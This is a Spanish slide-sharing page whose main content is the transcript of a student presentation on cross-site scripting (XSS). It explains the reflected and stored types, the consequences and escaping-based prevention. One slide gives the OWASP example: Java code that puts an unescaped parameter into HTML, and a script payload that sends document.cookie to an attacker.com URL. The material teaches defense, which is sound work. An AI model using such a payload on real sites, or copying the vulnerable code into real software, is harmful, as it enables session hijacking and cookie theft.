Secuencia de Comandos en Sitios Cruzados XSS

Slides:

Advertisements

Presentaciones similares

Presentación – Web Attack

Advertisements

HTML Instituto Universitario de Tecnología Valencia

1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.

Internet y tecnologías web

Jorge de Nova Segundo UD 6: Instalación y administración de servicios de correo electrónico Servicio de correo electrónico vía web.

Jorge de Nova Segundo UD4: Instalación y administración de servicios Web Navegadores Web.

Hoy en día cuando nos hablan de servidores pensamos tanto en grandes bases de datos como en servidores web, con una capacidad tan grande que pueden soportar.

Introducción a servidores

Modelando aplicaciones

Web Attacks Mauren Alies Maria Isabel Serrano Sergio Garcia

Construcción de Páginas WEB

CGI I La mayor parte de los elementos HTML de que disponemos permite al visitante visualizar los contenidos de un sitio, pero no interactuar con él. Dicho.

ADMINISTRACION DE REDES SECUENCIA DE COMANDOS EN SITIOS CRUZADOS(XSS)

Jessica Lizeth Flores Guerrero Coral Jazmín Ramírez Ortiz

Errores comunes al desarrollar websites

SESION 3 VALIDACIÓN. Septiembre 2010 SESION 3: VALIDACIÓN Qué propiedad de los controles podemos validar Control Propiedad de Validación HtmlInputText.

Curso de PHP Tema 6: Seguridad.

JSP Copyright ISIPE – Instituto de Servicios Informáticos para Empresas – Universidad Siglo 21 – Cualquier copia u otro uso debe ser autorizado expresamente.

Ing. Lorena Ruhl - Marco Rapallini - Javier FabiánMódulo 4: Seguridad y Aplicaciones Web Ing. A. Lorena Ruhl Universidad Tecnológica.

Mecanismo de petición y respuesta Prof. Manuel Blázquez Ochando

Gusanos. Recogen información del usuario y posiblemente produzcan problemas de espacio o tiempo, pero no ocasionan daños graves. Bombas lógicas o.

Tema 1 – Adopción de pautas de seguridad informática

ADMINISTRACION DE REDES TEMA REDIRECCIONES Y REENVÍOS NO VALIDADOS

TRABAJO DE SISTEMAS R EFERENCIA D IRECTA I NSEGURA A O BJETOS REALIZADO POR : DEISY MOSQUERA KARINA CHAVERRA.

ADMINISTRACION DE REDES SECUNECIA DE COMANDOS EN SITIOS CRUZADOS(XSS) DIEGO ALEXANDER MADRID DUQUE GABRIEL ANDRES AGUIRRE JARAMILLO INSTITUTO TECNOLOGICO.

Ingeniero Anyelo Quintero

JOSE FERNANDO MORA CARDONA Administración de redes - CTMA SENA 2012 FALLAS DE RESTRICCIÓN DE ACCESO A URL.

Los Diez Riesgos Más Importantes en Aplicaciones WEB Top A1-Inyección Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela.

HTML HyperText Markup Language (Lenguaje de Marcas de Hipertexto)

WEB VULNERABLE DVWA Universidad de Almería

Elementos vulnerables en el sistema informático: hardware, software y datos. Gabriel Montañés León.

The OWASP Foundation OWASP AppSec Aguascalientes 2010 Guía de Desarrollo Seguro Francisco Aldrete Miembro de OWASP capítulo Aguascalientes.

3 PROGRAMAR EN UN LENGUAJE DE HIPERTEXTO L.I. OSWALDO MARTINEZ C. EDPW.

INTRODUCCIÓN A LA PROGRAMACIÓN WEB

ASP.NET es una nueva y potente tecnología para escribir páginas web dinámica. Es una importante evolución respecto a las antiguas páginas ASP de Microsoft.

EXPLOITEXPLOIT Equipo 3Equipo 3. Exploit: Es un programa o código que "explota" una vulnerabilidad del sistema o de parte de él para aprovechar esta deficiencia.

TRABAJO DE SISTEMAS R EFERENCIA D IRECTA I NSEGURA A O BJETOS REALIZADO POR : DEISY MOSQUERA KARINA CHAVERRA.

Identificación con cookies y sesiones en PHP Programación en Internet II.

Lenguajes de programación para la web Lenguaje html Lenguaje java script Es un lenguaje estático para el desarrollo de sitios web Ventajas: Sencillo que.

ATAQUES POR INYECCION DE CODIGO SQL

UNIVERSIDAD TECNOLÓGICA ECOTEC. ISO 9001: Lucía Castro- Víctor Cabezas- Diana Checa UNIVERSIDAD ECOTEC Ataques Aplicaciones WEB Lucía Castro Víctor.

UD 1: “Adopción de pautas de seguridad informática” Análisis de las principales vulnerabilidades de un sistema informático. Luis Alfonso Sánchez Brazales.

Introducción al Lenguaje. ¿Qué es PHP? O Es un lenguaje de programación que es interpretado por un servidor web. O El lenguaje es genérico. PHP está orientado.

Google Analytics ¿Qué es? ¿Cómo se configura? Algunas funcionalidades Observaciones.

XSS CROSS SITE SCRIPTING Es un tipo de inseguridad informática o agujero de seguridad típico de las aplicaciones Web, que permite a una tercera parte.

 Los virus informáticos son programas que se introducen sin conocimiento del usuario en un ordenador para ejecutar en él acciones no deseadas.  Las.

COLEGIO DE BACHILLERES “XOCHIMILCO TEPEPAN” Nº13  Tecnologías de la Información y comunicación 3.  Profa. Gabriela Pichardo Lazardo EQUIPO 25  Emmanuel.

 Claudia Jordan Idrovo.  Son los puntos de enganche para cada conexión de red que realizamos. El protocolo TCP (el utilizado en internet) identifica.

CARLOS DANIEL VILLACIS MOLINA UNIVERSIDAD ECOTEC.

TEMA: AMENAZAS TIPICAS PARA UN PC. PHISHING Es un intento a través del teléfono, correo electrónico, mensajería instantánea o fax, de recabar información.

S EGURIDAD Y A LTA D ISPONIBILIDAD Nombre: Adrián de la Torre López 24/09/ Adrián de la Torre López.

Ihr Logo PHP Parte 2 “php toma muchas sintaxis de lenguajes de alto nivel conocidos para poder trabajar”

RASMUS LERDORF T IPEAMOS LA URL EN EL NAVEGADOR. S E ENVÍA EL MENSAJE A TRAVÉS DE INTERNET A LA COMPUTADORA. WWW. LANACION. COM / PAGINA 1. HTML SOLICITANDO.

File Transfer Protocol.

UD 1: “Adopción de pautas de seguridad informática”

Realización de las tareas básicas de internet. ¿Qué es Internet? Podemos definir a Internet como una "red de redes", es decir, una red que no sólo interconecta.

Análisis de las principales vulnerabilidades de un sistema informático. Gabriel Montañés León.

SEGURIDAD EN SERVIDORES WEB

Que es un navegador de Internet. Un navegador web o de Internet, es un programa que permite visualizar la información que contiene una página web (que.

Hipertexto Transfer Protocol o HTTP: define la sintaxis y la semántica que utilizan los elementos de software de la arquitectura web (clientes, servidores,

Integrante: Mariana Alcalá Hdz María del Carmen Andrade G. Alondra E. García Mtz Joselyn Gpe García V. Antonio de Jesús Hdz R. Cristian Jesús Ruvalcaba.

A NÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez.

COMPUTER DATA SYSTEMS malwares.

OWASP APPSEC RIO DE LA PLATA dcotelo13

Errores de Servidor Primer nivel – Piramide SEO. Error 404 y 503 Hay dos tipos de errores comunes que podemos encontrarnos navegando por un sitio web,

Softlogia S.R.L. Formación de Recursos Humanos Java Server Faces Instructor: Martin R. Baspineiro.

Definición: Es un estilo de programación, su objetivo primordial es la separación de la capa de presentación, capa de negocio y la capa de datos. ARQUITECTURA.

Hojas de Estilo UNIVERSIDAD TECNOLÓGICA DE AGUASCALIENTES.

Escuela Académica Profesional de Ingeniería de Sistemas Ing. Sanchez Castillo Eddye Arturo

Transcripción de la presentación:

Secuencia de Comandos en Sitios Cruzados XSS INTEGRANTES MICHELLE ZAPATA GREISY LARGO

Cross site scripting XSS, del inglés Cross-site scripting (Cruzar código al sitio) es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.

Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, (hojas de estilo en cascada). Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o JavaScript, en el contexto de otro sitio web

Las fallas XSS ocurren cada vez que una aplicación toma datos no confiables y los envía al navegador web sin una validación y codificación apropiada. XSS permite a los atacantes ejecutar secuencia de comandos en el navegador de la victima los cuales pueden secuestrar las sesiones de usuario, destruir sitios web, o dirigir al usuario hacia un sitio malicioso.

Los ataques XSS se pueden categorizar de la siguiente forma: Los ataques XSS se pueden categorizar de la siguiente forma: Almacenados y Reflejados

Los ataques XSS reflejados Los ataques reflejados son aquellos donde el código inyectado es reflejado fuera del servidor, tal como en un mensaje de error, el resultado de una búsqueda o cualquier otra respuesta que incluya una parte de la entrada enviada al servidor como parte de una solicitud.

Los ataques XSS almacenados Los ataques almacenados son aquellos en los que el código inyectado reside permanentemente en los servidores que lo envían, ya sea en la base de datos, en un mensaje de un foro, en un log de un visitante, campo de comentario, etc. La víctima descarga el script malicioso del servidor cuando hace alguna solicitud de contenido

Ejemplo escenario de ataques La aplicación utiliza datos no confiables en la construcción del siguiente código HTML sin validar o escapar los datos: (String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; El atacante modifica el parámetro ‘CC’ en el navegador: '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

CONSECUENCIAS Hacen pública la información de las cookies del usuario, permitiendo a los atacantes secuestrar la sesión y tomar el control de la misma. divulgación de los archivos del usuario, la instalación de troyanos, la redirección del usuario a alguna otra página y la modificación de la presentación del contenido

CONSECUENCIAS Otros ataques se pueden presentar desde los mismísimos servidores de aplicaciones o de web subyacentes ya que éstos generan páginas muy simples en caso de que ocurran algunos errores como en el caso del error 404 (Page not found) o un error 500 (Internal server error). Si estas páginas reflejan información de la petición del usuario (tal como la URL de la cual se quiso acceder), podría ser vulnerable a un ataque XSS reflejado.

¿Como poder evitar esto? Prevenir XSS requiere mantener los datos no confiables separados del contenido activo del navegador. La opción preferida es escapar todos los datos no confiables basados en el contexto HTML (cuerpo, atributo, JavaScript, CSS, o URL) donde los mismos serán ubicados. Los desarrolladores necesitan incluir esta técnica en sus aplicaciones al menos que el marco UI lo realice por ellos.